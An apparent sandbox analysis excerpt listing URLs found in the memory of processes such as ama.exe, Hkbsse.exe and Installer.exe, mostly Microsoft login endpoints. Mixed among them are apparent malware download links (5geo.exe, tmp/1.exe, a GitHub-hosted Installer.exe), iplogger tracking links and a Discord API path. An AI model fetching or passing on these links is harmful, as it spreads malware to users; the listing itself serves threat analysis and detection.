Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000001D.00000002.4218163762.0000018F5B42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258174424.0000018F5BD57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218210552.0000018F5B440000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/msangcwam
Source: RegAsm.exe, 00000017.00000002.2259714119.0000000003105000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.s
Source: RegAsm.exe, 00000017.00000002.2259714119.0000000003105000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: ama.exe, 00000004.00000002.2393678580.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: taskweaker.exe, 00000024.00000000.2297785618.00007FF636891000.00000002.00000001.01000000.00000018.sdmp, taskweaker.exe.2.dr	String found in binary or memory: https://auth.docker.com/
Source: ama.exe, 00000004.00000002.2393678580.0000000002C10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: ama.exe, 00000004.00000002.2393678580.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/2e88b5ff-15af-42da-aaae-e65938d632e2/downloads/8ec94b2f-0bee-
Source: ama.exe, 00000004.00000002.2393678580.00000000028E4000.00000004.00000800.00020000.00000000.sdmp, Installer.exe, 0000000D.00000003.2200974190.00000266EA4F5000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000000D.00000003.2200485500.00000266EC1F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/4c7L8Zs
Source: ama.exe, 00000004.00000002.2393678580.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org
Source: ama.exe, 00000004.00000002.2393678580.0000000002B14000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/tons1/tronssss/downloads/5geo.exe
Source: ama.exe, 00000004.00000002.2393678580.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2393678580.0000000002B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: ama.exe, 00000004.00000002.2402579034.00000000058EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comrex.pk/
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comrex.pk/M
Source: Hkbsse.exe, 0000000B.00000002.4490320426.0000000000CAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://comrex.pk/tmp/1.exe
Source: ama.exe, 00000004.00000002.2393678580.0000000002B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d136azpfpnge1l.cloudfront.net/;
Source: ama.exe, 00000004.00000002.2393678580.0000000002B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://d301sr5gafysq2.cloudfront.net/
Source: RegAsm.exe, 00000017.00000002.2259714119.00000000031D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: svchost.exe, 0000001C.00000003.2252819233.0000019C9FBC3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 0000001C.00000003.2252819233.0000019C9FB50000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.28.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/
Source: Installer.exe, 0000000D.00000003.2200974190.00000266EA4F5000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000000D.00000003.2200485500.00000266EC1F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/frielandrews892/File/releases/download/File/File.zip
Source: axplong.exe, 00000002.00000002.4492544980.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.4492544980.0000000001455000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/frielandrews892/File/releases/download/installer/Installer.exe
Source: ama.exe, 00000004.00000002.2393678580.0000000002B14000.00000004.00000800.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2402263316.0000000005881000.00000004.00000020.00020000.00000000.sdmp, ama.exe, 00000004.00000002.2405439100.0000000006BB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.co/1lLub
Source: ama.exe, 00000004.00000002.2402263316.0000000005881000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.co/1lLub(
Source: ama.exe, 00000004.00000002.2393678580.0000000002824000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.co/1lLubE%
Source: ama.exe, 00000004.00000002.2402263316.0000000005881000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.co/1lLubL
Source: ama.exe, 00000004.00000002.2405439100.0000000006BB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.co/1lLubV
Source: svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live
Source: svchost.exe, 0000001D.00000002.4221491538.0000018F5B509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.
Source: svchost.exe, 0000001D.00000002.4218163762.0000018F5B42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ApproveSession.srf
Source: svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000001D.00000003.2258319041.0000018F5BD6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502ive.
Source: svchost.exe, 0000001D.00000003.2258319041.0000018F5BD6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600sien
Source: svchost.exe, 0000001D.00000003.2258319041.0000018F5BD6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257707638.0000018F5BD2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000001D.00000002.4218163762.0000018F5B42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218210552.0000018F5B440000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 0000001D.00000002.4218163762.0000018F5B42B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srf
Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srf53457
Source: svchost.exe, 0000001D.00000002.4218163762.0000018F5B42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 0000001D.00000003.2257782540.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 0000001D.00000003.2257782540.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/didtou.srfx
Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218210552.0000018F5B440000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218210552.0000018F5B440000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getuserrealm.srf
Source: svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsec
Source: svchost.exe, 0000001D.00000003.2257782540.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000001D.00000003.2257782540.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf0
Source: svchost.exe, 0000001D.00000003.2257782540.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000001D.00000003.2257782540.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfD
Source: svchost.exe, 0000001D.00000003.2257782540.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srffg:CXHT
Source: svchost.exe, 0000001D.00000002.4218163762.0000018F5B42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
Source: svchost.exe, 0000001D.00000003.2258319041.0000018F5BD6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
Source: svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srfcfg:GetAp
Source: svchost.exe, 0000001D.00000002.4221491538.0000018F5B509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/Inl
Source: svchost.exe, 0000001D.00000003.2258319041.0000018F5BD6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257707638.0000018F5BD2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 0000001D.00000003.4214520931.0000018F5C2B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2352067382.0000018F5BD5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DtKcP7lo0v3MXITi1HnNLX0goGJuNR0Ei0YySbWa
Source: svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srfcfg:CXH
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 0000001D.00000003.2258319041.0000018F5BD6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfSessions
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD2C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214925411.0000018F5B450000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214925411.0000018F5B450000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806035
Source: svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 0000001D.00000002.4218163762.0000018F5B42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 0000001D.00000002.4218163762.0000018F5B42B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258174424.0000018F5BD57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214925411.0000018F5B450000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257878647.0000018F5BD5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000001D.00000003.2257707638.0000018F5BD29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258618096.0000018F5BD56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257914950.0000018F5BD52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 0000001D.00000003.2257782540.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258275552.0000018F5BD63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257782540.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 0000001D.00000002.4226009527.0000018F5C298000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf3
Source: svchost.exe, 0000001D.00000002.4218449892.0000018F5B45F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srfE
Source: svchost.exe, 0000001D.00000003.2257782540.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
Source: svchost.exe, 0000001D.00000003.4214851034.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfc
Source: svchost.exe, 0000001D.00000003.2257782540.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 0000001D.00000003.2257782540.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 0000001D.00000003.2258208946.0000018F5BD40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2258126062.0000018F5BD3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.4218210552.0000018F5B440000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001D.00000003.2257782540.0000018F5B44F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/resetpw.srf
